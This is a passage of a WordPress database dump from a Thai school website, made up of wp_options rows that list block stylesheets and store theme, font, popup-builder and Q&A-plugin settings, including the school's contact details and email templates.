e.css\";i:267;s:25:\"post-author/style.min.css\";i:268;s:33:\"post-comments-form/editor-rtl.css\";i:269;s:37:\"post-comments-form/editor-rtl.min.css\";i:270;s:29:\"post-comments-form/editor.css\";i:271;s:33:\"post-comments-form/editor.min.css\";i:272;s:32:\"post-comments-form/style-rtl.css\";i:273;s:36:\"post-comments-form/style-rtl.min.css\";i:274;s:28:\"post-comments-form/style.css\";i:275;s:32:\"post-comments-form/style.min.css\";i:276;s:27:\"post-content/editor-rtl.css\";i:277;s:31:\"post-content/editor-rtl.min.css\";i:278;s:23:\"post-content/editor.css\";i:279;s:27:\"post-content/editor.min.css\";i:280;s:23:\"post-date/style-rtl.css\";i:281;s:27:\"post-date/style-rtl.min.css\";i:282;s:19:\"post-date/style.css\";i:283;s:23:\"post-date/style.min.css\";i:284;s:27:\"post-excerpt/editor-rtl.css\";i:285;s:31:\"post-excerpt/editor-rtl.min.css\";i:286;s:23:\"post-excerpt/editor.css\";i:287;s:27:\"post-excerpt/editor.min.css\";i:288;s:26:\"post-excerpt/style-rtl.css\";i:289;s:30:\"post-excerpt/style-rtl.min.css\";i:290;s:22:\"post-excerpt/style.css\";i:291;s:26:\"post-excerpt/style.min.css\";i:292;s:34:\"post-featured-image/editor-rtl.css\";i:293;s:38:\"post-featured-image/editor-rtl.min.css\";i:294;s:30:\"post-featured-image/editor.css\";i:295;s:34:\"post-featured-image/editor.min.css\";i:296;s:33:\"post-featured-image/style-rtl.css\";i:297;s:37:\"post-featured-image/style-rtl.min.css\";i:298;s:29:\"post-featured-image/style.css\";i:299;s:33:\"post-featured-image/style.min.css\";i:300;s:34:\"post-navigation-link/style-rtl.css\";i:301;s:38:\"post-navigation-link/style-rtl.min.css\";i:302;s:30:\"post-navigation-link/style.css\";i:303;s:34:\"post-navigation-link/style.min.css\";i:304;s:28:\"post-template/editor-rtl.css\";i:305;s:32:\"post-template/editor-rtl.min.css\";i:306;s:24:\"post-template/editor.css\";i:307;s:28:\"post-template/editor.min.css\";i:308;s:27:\"post-template/style-rtl.css\";i:309;s:31:\"post-template/style-rtl.min.css\";i:310;s:23:\"post-template/style.css\";i:311;s:27:\"post-template/style.min.css\";i:312;s:24:\"post-terms/style-rtl.css\";i:313;s:28:\"post-terms/style-rtl.min.css\";i:314;s:20:\"post-terms/style.css\";i:315;s:24:\"post-terms/style.min.css\";i:316;s:24:\"post-title/style-rtl.css\";i:317;s:28:\"post-title/style-rtl.min.css\";i:318;s:20:\"post-title/style.css\";i:319;s:24:\"post-title/style.min.css\";i:320;s:26:\"preformatted/style-rtl.css\";i:321;s:30:\"preformatted/style-rtl.min.css\";i:322;s:22:\"preformatted/style.css\";i:323;s:26:\"preformatted/style.min.css\";i:324;s:24:\"pullquote/editor-rtl.css\";i:325;s:28:\"pullquote/editor-rtl.min.css\";i:326;s:20:\"pullquote/editor.css\";i:327;s:24:\"pullquote/editor.min.css\";i:328;s:23:\"pullquote/style-rtl.css\";i:329;s:27:\"pullquote/style-rtl.min.css\";i:330;s:19:\"pullquote/style.css\";i:331;s:23:\"pullquote/style.min.css\";i:332;s:23:\"pullquote/theme-rtl.css\";i:333;s:27:\"pullquote/theme-rtl.min.css\";i:334;s:19:\"pullquote/theme.css\";i:335;s:23:\"pullquote/theme.min.css\";i:336;s:39:\"query-pagination-numbers/editor-rtl.css\";i:337;s:43:\"query-pagination-numbers/editor-rtl.min.css\";i:338;s:35:\"query-pagination-numbers/editor.css\";i:339;s:39:\"query-pagination-numbers/editor.min.css\";i:340;s:31:\"query-pagination/editor-rtl.css\";i:341;s:35:\"query-pagination/editor-rtl.min.css\";i:342;s:27:\"query-pagination/editor.css\";i:343;s:31:\"query-pagination/editor.min.css\";i:344;s:30:\"query-pagination/style-rtl.css\";i:345;s:34:\"query-pagination/style-rtl.min.css\";i:346;s:26:\"query-pagination/style.css\";i:347;s:30:\"query-pagination/style.min.css\";i:348;s:25:\"query-title/style-rtl.css\";i:349;s:29:\"query-title/style-rtl.min.css\";i:350;s:21:\"query-title/style.css\";i:351;s:25:\"query-title/style.min.css\";i:352;s:20:\"query/editor-rtl.css\";i:353;s:24:\"query/editor-rtl.min.css\";i:354;s:16:\"query/editor.css\";i:355;s:20:\"query/editor.min.css\";i:356;s:19:\"quote/style-rtl.css\";i:357;s:23:\"quote/style-rtl.min.css\";i:358;s:15:\"quote/style.css\";i:359;s:19:\"quote/style.min.css\";i:360;s:19:\"quote/theme-rtl.css\";i:361;s:23:\"quote/theme-rtl.min.css\";i:362;s:15:\"quote/theme.css\";i:363;s:19:\"quote/theme.min.css\";i:364;s:23:\"read-more/style-rtl.css\";i:365;s:27:\"read-more/style-rtl.min.css\";i:366;s:19:\"read-more/style.css\";i:367;s:23:\"read-more/style.min.css\";i:368;s:18:\"rss/editor-rtl.css\";i:369;s:22:\"rss/editor-rtl.min.css\";i:370;s:14:\"rss/editor.css\";i:371;s:18:\"rss/editor.min.css\";i:372;s:17:\"rss/style-rtl.css\";i:373;s:21:\"rss/style-rtl.min.css\";i:374;s:13:\"rss/style.css\";i:375;s:17:\"rss/style.min.css\";i:376;s:21:\"search/editor-rtl.css\";i:377;s:25:\"search/editor-rtl.min.css\";i:378;s:17:\"search/editor.css\";i:379;s:21:\"search/editor.min.css\";i:380;s:20:\"search/style-rtl.css\";i:381;s:24:\"search/style-rtl.min.css\";i:382;s:16:\"search/style.css\";i:383;s:20:\"search/style.min.css\";i:384;s:20:\"search/theme-rtl.css\";i:385;s:24:\"search/theme-rtl.min.css\";i:386;s:16:\"search/theme.css\";i:387;s:20:\"search/theme.min.css\";i:388;s:24:\"separator/editor-rtl.css\";i:389;s:28:\"separator/editor-rtl.min.css\";i:390;s:20:\"separator/editor.css\";i:391;s:24:\"separator/editor.min.css\";i:392;s:23:\"separator/style-rtl.css\";i:393;s:27:\"separator/style-rtl.min.css\";i:394;s:19:\"separator/style.css\";i:395;s:23:\"separator/style.min.css\";i:396;s:23:\"separator/theme-rtl.css\";i:397;s:27:\"separator/theme-rtl.min.css\";i:398;s:19:\"separator/theme.css\";i:399;s:23:\"separator/theme.min.css\";i:400;s:24:\"shortcode/editor-rtl.css\";i:401;s:28:\"shortcode/editor-rtl.min.css\";i:402;s:20:\"shortcode/editor.css\";i:403;s:24:\"shortcode/editor.min.css\";i:404;s:24:\"site-logo/editor-rtl.css\";i:405;s:28:\"site-logo/editor-rtl.min.css\";i:406;s:20:\"site-logo/editor.css\";i:407;s:24:\"site-logo/editor.min.css\";i:408;s:23:\"site-logo/style-rtl.css\";i:409;s:27:\"site-logo/style-rtl.min.css\";i:410;s:19:\"site-logo/style.css\";i:411;s:23:\"site-logo/style.min.css\";i:412;s:27:\"site-tagline/editor-rtl.css\";i:413;s:31:\"site-tagline/editor-rtl.min.css\";i:414;s:23:\"site-tagline/editor.css\";i:415;s:27:\"site-tagline/editor.min.css\";i:416;s:25:\"site-title/editor-rtl.css\";i:417;s:29:\"site-title/editor-rtl.min.css\";i:418;s:21:\"site-title/editor.css\";i:419;s:25:\"site-title/editor.min.css\";i:420;s:24:\"site-title/style-rtl.css\";i:421;s:28:\"site-title/style-rtl.min.css\";i:422;s:20:\"site-title/style.css\";i:423;s:24:\"site-title/style.min.css\";i:424;s:26:\"social-link/editor-rtl.css\";i:425;s:30:\"social-link/editor-rtl.min.css\";i:426;s:22:\"social-link/editor.css\";i:427;s:26:\"social-link/editor.min.css\";i:428;s:27:\"social-links/editor-rtl.css\";i:429;s:31:\"social-links/editor-rtl.min.css\";i:430;s:23:\"social-links/editor.css\";i:431;s:27:\"social-links/editor.min.css\";i:432;s:26:\"social-links/style-rtl.css\";i:433;s:30:\"social-links/style-rtl.min.css\";i:434;s:22:\"social-links/style.css\";i:435;s:26:\"social-links/style.min.css\";i:436;s:21:\"spacer/editor-rtl.css\";i:437;s:25:\"spacer/editor-rtl.min.css\";i:438;s:17:\"spacer/editor.css\";i:439;s:21:\"spacer/editor.min.css\";i:440;s:20:\"spacer/style-rtl.css\";i:441;s:24:\"spacer/style-rtl.min.css\";i:442;s:16:\"spacer/style.css\";i:443;s:20:\"spacer/style.min.css\";i:444;s:20:\"table/editor-rtl.css\";i:445;s:24:\"table/editor-rtl.min.css\";i:446;s:16:\"table/editor.css\";i:447;s:20:\"table/editor.min.css\";i:448;s:19:\"table/style-rtl.css\";i:449;s:23:\"table/style-rtl.min.css\";i:450;s:15:\"table/style.css\";i:451;s:19:\"table/style.min.css\";i:452;s:19:\"table/theme-rtl.css\";i:453;s:23:\"table/theme-rtl.min.css\";i:454;s:15:\"table/theme.css\";i:455;s:19:\"table/theme.min.css\";i:456;s:23:\"tag-cloud/style-rtl.css\";i:457;s:27:\"tag-cloud/style-rtl.min.css\";i:458;s:19:\"tag-cloud/style.css\";i:459;s:23:\"tag-cloud/style.min.css\";i:460;s:28:\"template-part/editor-rtl.css\";i:461;s:32:\"template-part/editor-rtl.min.css\";i:462;s:24:\"template-part/editor.css\";i:463;s:28:\"template-part/editor.min.css\";i:464;s:27:\"template-part/theme-rtl.css\";i:465;s:31:\"template-part/theme-rtl.min.css\";i:466;s:23:\"template-part/theme.css\";i:467;s:27:\"template-part/theme.min.css\";i:468;s:30:\"term-description/style-rtl.css\";i:469;s:34:\"term-description/style-rtl.min.css\";i:470;s:26:\"term-description/style.css\";i:471;s:30:\"term-description/style.min.css\";i:472;s:27:\"text-columns/editor-rtl.css\";i:473;s:31:\"text-columns/editor-rtl.min.css\";i:474;s:23:\"text-columns/editor.css\";i:475;s:27:\"text-columns/editor.min.css\";i:476;s:26:\"text-columns/style-rtl.css\";i:477;s:30:\"text-columns/style-rtl.min.css\";i:478;s:22:\"text-columns/style.css\";i:479;s:26:\"text-columns/style.min.css\";i:480;s:19:\"verse/style-rtl.css\";i:481;s:23:\"verse/style-rtl.min.css\";i:482;s:15:\"verse/style.css\";i:483;s:19:\"verse/style.min.css\";i:484;s:20:\"video/editor-rtl.css\";i:485;s:24:\"video/editor-rtl.min.css\";i:486;s:16:\"video/editor.css\";i:487;s:20:\"video/editor.min.css\";i:488;s:19:\"video/style-rtl.css\";i:489;s:23:\"video/style-rtl.min.css\";i:490;s:15:\"video/style.css\";i:491;s:19:\"video/style.min.css\";i:492;s:19:\"video/theme-rtl.css\";i:493;s:23:\"video/theme-rtl.min.css\";i:494;s:15:\"video/theme.css\";i:495;s:19:\"video/theme.min.css\";}}','yes'),
(124,'recovery_keys','a:0:{}','off'),
(126,'theme_mods_twentytwentyfour','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1722047696;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}}}}','off'),
(156,'ftp_credentials','a:3:{s:8:\"hostname\";s:9:\"localhost\";s:8:\"username\";s:4:\"w169\";s:15:\"connection_type\";s:3:\"ftp\";}','off'),
(164,'finished_updating_comment_type','1','auto'),
(167,'new_admin_email','patcharapol@ro.ac.th','auto'),
(178,'current_theme','Plant','auto'),
(179,'theme_mods_plant','a:21:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:7:\"primary\";i:2;s:6:\"mobile\";i:2;}s:18:\"custom_css_post_id\";i:-1;s:11:\"custom_logo\";i:9;s:10:\"hide_title\";b:1;s:11:\"head_shadow\";b:1;s:14:\"footer_columns\";a:4:{i:0;a:3:{s:5:\"width\";i:25;s:7:\"display\";s:3:\"all\";s:5:\"align\";s:7:\"default\";}i:1;a:3:{s:5:\"width\";i:25;s:7:\"display\";s:3:\"all\";s:5:\"align\";s:7:\"default\";}i:2;a:3:{s:5:\"width\";i:25;s:7:\"display\";s:3:\"all\";s:5:\"align\";s:7:\"default\";}i:3;a:3:{s:5:\"width\";i:25;s:7:\"display\";s:3:\"all\";s:5:\"align\";s:7:\"default\";}}s:18:\"head_logo_height_d\";s:4:\"60px\";s:13:\"head_height_m\";s:4:\"60px\";s:18:\"head_logo_height_m\";s:4:\"45px\";s:10:\"color_body\";b:1;s:14:\"buttons_enable\";b:1;s:20:\"buttons_icon_message\";s:27:\"ติดต่อเรา\";s:16:\"buttons_channels\";a:4:{i:0;s:8:\"facebook\";i:1;s:9:\"messenger\";i:2;s:6:\"mobile\";i:3;s:5:\"email\";}s:21:\"buttons_messenger_url\";s:27:\"https://m.me/61565350226486\";s:20:\"buttons_facebook_url\";s:74:\"https://www.facebook.com/profile.php?id=61565350226486&amp;mibextid=ZbWKwL\";s:18:\"buttons_mobile_url\";s:12:\"093-325-2659\";s:12:\"buttons_icon\";s:7:\"comment\";s:14:\"consent_enable\";b:1;s:22:\"buttons_mobile_tooltip\";s:3:\"Tel\";s:17:\"buttons_email_url\";s:26:\"33010169@sisaketedu1.go.th\";}','on'),
(180,'theme_switched','','auto'),
(183,'acf_version','6.2.0','auto'),
(185,'n2_ss3_version','3.5.1.19/b:release-3.5.1.19/r:4e06d1a7c4bae6a4e54c585b3749e7c169b51386','auto'),
(186,'widget_smartslider3','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(190,'_site_transient_wp_plugin_dependencies_plugin_data','a:0:{}','off'),
(195,'pt_cv_version','4.2','auto'),
(196,'recently_activated','a:0:{}','off'),
(209,'generateblocks_dynamic_css_posts','a:0:{}','on'),
(210,'generateblocks_dynamic_css_time','1722048122','on'),
(211,'generateblocks_do_activation_redirect','1','auto'),
(213,'kadence_blocks_schema_version','1','auto'),
(214,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(215,'stellarwp_telemetry_last_send','','auto'),
(216,'stellarwp_telemetry','a:1:{s:7:\"plugins\";a:1:{s:14:\"kadence-blocks\";a:2:{s:7:\"wp_slug\";s:33:\"kadence-blocks/kadence-blocks.php\";s:5:\"optin\";b:0;}}}','auto'),
(217,'stellarwp_telemetry_kadence-blocks_show_optin','1','auto'),
(218,'generateblocks_version','2.1.1','auto'),
(219,'kadenceblocks_data_settings','a:4:{s:10:\"db_version\";i:0;s:15:\"version_history\";a:5:{i:1758521661;s:6:\"3.5.21\";i:1756264092;s:6:\"3.5.18\";i:1753982058;s:6:\"3.5.16\";i:1747212292;s:5:\"3.5.7\";i:0;s:3:\"new\";}s:13:\"prior_version\";s:6:\"3.5.18\";s:15:\"current_version\";s:6:\"3.5.21\";}','auto'),
(227,'site_logo','9','auto'),
(234,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','off'),
(248,'wp_calendar_block_has_published_posts','1','auto'),
(250,'seed_fonts_is_enabled','a:1:{i:0;s:2:\"on\";}','auto'),
(251,'seed_fonts_is_google_fonts','a:1:{i:0;s:2:\"on\";}','auto'),
(252,'seed_fonts_google_font_name','Kanit','auto'),
(253,'seed_fonts_font','anuphan','auto'),
(254,'seed_fonts_weight','400','auto'),
(255,'seed_fonts_selectors','h1, h2, h3, h4, h5, h6, nav, .nav, .menu, button, .button, .btn, .price, ._heading, .wp-block-pullquote blockquote, blockquote, label, legend','auto'),
(256,'seed_fonts_is_important','a:1:{i:0;s:2:\"on\";}','auto'),
(257,'seed_fonts_css-generated','h1, h2, h3, h4, h5, h6, nav, .nav, .menu, button, .button, .btn, .price, ._heading, .wp-block-pullquote blockquote, blockquote, label, legend \r\n  font-family: Kanit, san-serif !important;\r\n  font-weight: 400 !important;\r\n','auto'),
(258,'seed_fonts_body-css-generated','body \r\n  font-family: Kanit, san-serif !important;\r\n  font-size: 16px !important;\r\n  font-weight: 300 !important;\r\n  line-height: 1.6 !important;\r\n','auto'),
(261,'seed_fonts_body_is_enabled','a:1:{i:0;s:2:\"on\";}','auto'),
(262,'seed_fonts_body_is_google_fonts','a:1:{i:0;s:2:\"on\";}','auto'),
(263,'seed_fonts_body_google_font_name','Kanit','auto'),
(264,'seed_fonts_body_font','anuphan','auto'),
(265,'seed_fonts_body_weight','300','auto'),
(266,'seed_fonts_body_size','16','auto'),
(267,'seed_fonts_body_size_unit','px','auto'),
(268,'seed_fonts_body_lineheight','1.6','auto'),
(269,'seed_fonts_body_selectors','body','auto'),
(270,'seed_fonts_body_is_important','a:1:{i:0;s:2:\"on\";}','auto'),
(458,'https_detection_errors','a:1:{s:20:\"https_request_failed\";a:1:{i:0;s:55:\"การร้องขอ HTTPS ล้มเหลว\";}}','off'),
(459,'_transient_health-check-site-status-result','{\"good\":14,\"recommended\":7,\"critical\":2}','on'),
(630,'category_children','a:0:{}','auto'),
(655,'sgpb-dont-delete-data','1','auto'),
(656,'sgpbUnsubscribeColumnFixed','1','auto'),
(657,'SGPBUsageDays','0','auto'),
(658,'SGPBInstallDate','1722314957','auto'),
(659,'SGPBOpenNextTime','1724906957','auto'),
(660,'SGPBMaxOpenCount','80','auto'),
(661,'sgpbPopupBuilderRegisteredPlugins','{\"popup-builder\\/popup-builder.php\":{\"classPath\":\"popup-builder\\/com\\/classes\\/extension\\/SgpbPopupExtension.php\",\"className\":\"SgpbPopupExtension\",\"options\":[]}}','auto'),
(662,'SGPB_INACTIVE_EXTENSIONS','inactive','auto'),
(664,'sgpbModifiedRegisteredPluginsPaths2','1','auto'),
(665,'sgpb-all-notifications-data','[{\"priority\":1,\"type\":1,\"id\":\"sgpbMainRateUsNotification\",\"message\":\"\\t\\t<style>\\r\\n\\t\\t\\t.sgpb-buttons-wrapper .press{\\r\\n\\t\\t\\t\\tbox-sizing:border-box;\\r\\n\\t\\t\\t\\tcursor:pointer;\\r\\n\\t\\t\\t\\tdisplay:inline-block;\\r\\n\\t\\t\\t\\tfont-size:1em;\\r\\n\\t\\t\\t\\tmargin:0;\\r\\n\\t\\t\\t\\tpadding:0.5em 0.75em;\\r\\n\\t\\t\\t\\ttext-decoration:none;\\r\\n\\t\\t\\t\\ttransition:background 0.15s linear\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-buttons-wrapper .press-grey {\\r\\n\\t\\t\\t\\tbackground-color:#9E9E9E;\\r\\n\\t\\t\\t\\tborder:2px solid #9E9E9E;\\r\\n\\t\\t\\t\\tcolor: #FFF;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-buttons-wrapper .press-lightblue {\\r\\n\\t\\t\\t\\tbackground-color:#03A9F4;\\r\\n\\t\\t\\t\\tborder:2px solid #03A9F4;\\r\\n\\t\\t\\t\\tcolor: #FFF;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-buttons-wrapper {\\r\\n\\t\\t\\t\\ttext-align: center;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-review-wrapper{\\r\\n\\t\\t\\t\\ttext-align: center;\\r\\n\\t\\t\\t\\tpadding: 20px;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-review-wrapper p {\\r\\n\\t\\t\\t\\tcolor: black;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgpb-review-h1 {\\r\\n\\t\\t\\t\\tfont-size: 22px;\\r\\n\\t\\t\\t\\tfont-weight: normal;\\r\\n\\t\\t\\t\\tline-height: 1.384;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgrb-review-h2{\\r\\n\\t\\t\\t\\tfont-size: 20px;\\r\\n\\t\\t\\t\\tfont-weight: normal;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t:root {\\r\\n\\t\\t\\t\\t--main-bg-color: #1ac6ff;\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgrb-review-strong{\\r\\n\\t\\t\\t\\tcolor: var(--main-bg-color);\\r\\n\\t\\t\\t}\\r\\n\\t\\t\\t.sgrb-review-mt20{\\r\\n\\t\\t\\t\\tmargin-top: 20px\\r\\n\\t\\t\\t}\\r\\n\\t\\t<\\/style>\\r\\n\\t\\t<div class=\\\"sgpb-review-wrapper\\\">\\r\\n\\t\\t\\t<div class=\\\"sgpb-review-description\\\">\\r\\n\\t\\t\\t\\t<h1 class=\\\"sgpb-review-h1\\\"><strong class=\\\"sgrb-review-strong\\\">This is great!<\\/strong> We have noticed that you are using Popup Builder plugin on your site for 421 days, we are thankful for that.<\\/h1>\\t\\t\\t\\t<h2 class=\\\"sgrb-review-h2\\\">This is really great for your website score.<\\/h2>\\r\\n\\t\\t\\t\\t<p class=\\\"sgrb-review-mt20\\\">Have your input in the development of our plugin, and we\\u2019ll provide better conversions for your site!&lt;br \\/&gt; Leave your 5-star positive review and help us go further to the perfection!<\\/p>\\r\\n\\t\\t\\t<\\/div>\\r\\n\\t\\t\\t<div class=\\\"sgpb-buttons-wrapper\\\">\\r\\n\\t\\t\\t\\t<button class=\\\"press press-grey sgpb-button-1 sgpb-close-promo-notification\\\" data-action=\\\"sg-already-did-review\\\">I already did<\\/button>\\r\\n\\t\\t\\t\\t<button class=\\\"press press-lightblue sgpb-button-3 sgpb-close-promo-notification\\\" data-action=\\\"sg-you-worth-it\\\">You worth it!<\\/button>\\r\\n\\t\\t\\t\\t<button class=\\\"press press-grey sgpb-button-2 sgpb-close-promo-notification\\\" data-action=\\\"sg-show-popup-period\\\" data-message-type=\\\"days\\\">Maybe later<\\/button><\\/div>\\r\\n\\t\\t\\t<div>\\u00a0<\\/div>\\r\\n\\t\\t<\\/div>\\r\\n\\t\\t\"},{\"id\":\"sgpbMainSupportBanner\",\"priority\":1,\"type\":1,\"message\":\"<div class=\\\"sgpb-support-notification-wrapper sgpb-wrapper\\\"><h4 class=\\\"sgpb-support-notification-title\\\">Need some help?<\\/h4><h4 class=\\\"sgpb-support-notification-title\\\">Let us know what you think.<\\/h4><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/popup-builder\\/reviews\\/\\\"><span class=\\\"dashicons sgpb-dashicons-heart sgpb-info-text-white\\\"><\\/span><span class=\\\"sg-info-text\\\">Rate Us<\\/span><\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/help.popup-builder.com\\\"><span class=\\\"dashicons sgpb-dashicons-megaphone sgpb-info-text-white\\\"><\\/span>Support Portal<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/wordpress.org\\/support\\/plugin\\/popup-builder\\\"><span class=\\\"dashicons sgpb-dashicons-admin-plugins sgpb-info-text-white\\\"><\\/span>Support Forum<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"https:\\/\\/popup-builder.com\\/\\\"><span class=\\\"dashicons sgpb-dashicons-editor-help sgpb-info-text-white\\\"><\\/span>LIVE chat<\\/a><a class=\\\"btn btn-info\\\" target=\\\"_blank\\\" href=\\\"mailto:support@popup-builder.com?subject=Hello\\\"><span class=\\\"dashicons sgpb-dashicons-email-alt sgpb-info-text-white\\\"><\\/span>Email<\\/a><\\/div><div class=\\\"sgpb-support-notification-dont-show\\\">Bored of this?<a class=\\\"sgpb-dont-show-again-support-notification\\\" href=\\\"javascript:void(0)\\\"> Press here <\\/a>and we will not show it again!<\\/div>\"}]','auto'),
(921,'sgpb-unnecessary-scripts-removed-1','1','auto'),
(930,'SgpbCounter','a:2:{i:328;i:1;i:1888;i:5;}','auto'),
(935,'question_cat_children','a:0:{}','auto'),
(936,'widget_qa_widget_leaderboard','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(937,'widget_qa_widget_top_questions','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(938,'widget_qa_widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(939,'widget_qa_widget_tags','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(940,'widget_qa_widget_website_stats','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(941,'widget_qa_widget_latest_questions','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(942,'qa_featured_questions','a:0:{}','auto'),
(952,'recovery_mode_email_last_sent','1747804292','auto'),
(955,'qa_question_item_per_page','10','auto'),
(956,'qa_reCAPTCHA_site_key','','auto'),
(957,'qa_reCAPTCHA_secret_key','','auto'),
(958,'qa_reCAPTCHA_enable_question','yes','auto'),
(959,'qa_options_filter_badwords','yes','auto'),
(960,'qa_options_badwords','','auto'),
(961,'qa_options_badwords_replacer','','auto'),
(962,'qa_options_quick_notes','a:1:{i:0;s:0:\"\";}','auto'),
(963,'single_question_access_role','a:0:{}','auto'),
(964,'qa_who_can_see_quick_notes','','auto'),
(965,'qa_answer_filter_options','a:0:{}','auto'),
(966,'qa_show_answer_filter','yes','auto'),
(967,'qa_account_required_post_answer','yes','auto'),
(968,'qa_submitted_answer_status','publish','auto'),
(969,'qa_who_can_answer','a:1:{i:0;s:13:\"administrator\";}','auto'),
(970,'qa_who_can_comment_answer','a:1:{i:0;s:13:\"administrator\";}','auto'),
(971,'qa_can_edit_answer','yes','auto'),
(972,'qa_answer_editor_type','wp_editor','auto'),
(973,'qa_answer_editor_media_buttons','yes','auto'),
(974,'qa_answer_reply_order','DESC','auto'),
(975,'qa_page_question_post','','auto'),
(976,'qa_page_question_post_redirect','','auto'),
(977,'qa_page_question_archive','','auto'),
(978,'qa_page_user_profile','','auto'),
(979,'qa_page_myaccount','','auto'),
(980,'qa_enable_poll','yes','auto'),
(981,'qa_account_required_post_question','no','auto'),
(982,'qa_submitted_question_status','publish','auto'),
(983,'qa_allow_question_comment','yes','auto'),
(984,'access_to_private_answer','a:1:{i:0;s:13:\"administrator\";}','auto'),
(985,'qa_myaccount_show_login_form','yes','auto'),
(986,'qa_myaccount_login_redirect_page','','auto'),
(987,'qa_myaccount_show_register_form','yes','auto'),
(988,'qa_color_archive_answer_count','','auto'),
(989,'qa_color_archive_view_count','','auto'),
(990,'qa_color_single_user_role','','auto'),
(991,'qa_color_single_user_role_background','','auto'),
(992,'qa_color_add_comment_background','','auto'),
(993,'qa_ask_button_bg_color','','auto'),
(994,'qa_color_best_answer_background','','auto'),
(995,'qa_ask_button_text_color','','auto'),
(996,'qa_vote_button_bg_color','','auto'),
(997,'qa_flag_button_bg_color','','auto'),
(998,'qa_logo_url','','auto'),
(999,'qa_from_email','','auto'),
(1000,'qa_email_templates_data','a:14:{s:22:\"new_question_submitted\";a:7:{s:4:\"name\";s:22:\"New question submitted\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:35:\"New question submitted - {site_url}\";s:4:\"html\";s:2006:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; has submitted a question.&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{question_url}&quot;&gt;{question_title}&lt;/a&gt;\r\n{question_content}&lt;/p&gt;\r\n\r\n&lt;div style=&quot;padding: 10px 0 0;&quot;&gt;&lt;a class=&quot;btn&quot; style=&quot;color: #fff; border-radius: 3px; text-decoration: none; background-color: #51b3ff; padding: 10px 20px; font-size: 14px; font-family: Arial, sans-serif;&quot; href=&quot;{question_edit_url}&quot;&gt;Edit/Approved Question&lt;/a&gt;&lt;/div&gt;&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}s:22:\"new_question_published\";a:7:{s:4:\"name\";s:22:\"New question published\";s:6:\"enable\";s:3:\"yes\";s:8:\"email_to\";s:20:\"patcharapol@ro.ac.th\";s:15:\"email_from_name\";s:88:\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\";s:10:\"email_from\";s:20:\"patcharapol@ro.ac.th\";s:7:\"subject\";s:35:\"New question published - {site_url}\";s:4:\"html\";s:1993:\"&lt;div style=&quot;background: #f5f5f5; color: #333; font-size: 14px; line-height: 20px; font-family: Arial, sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 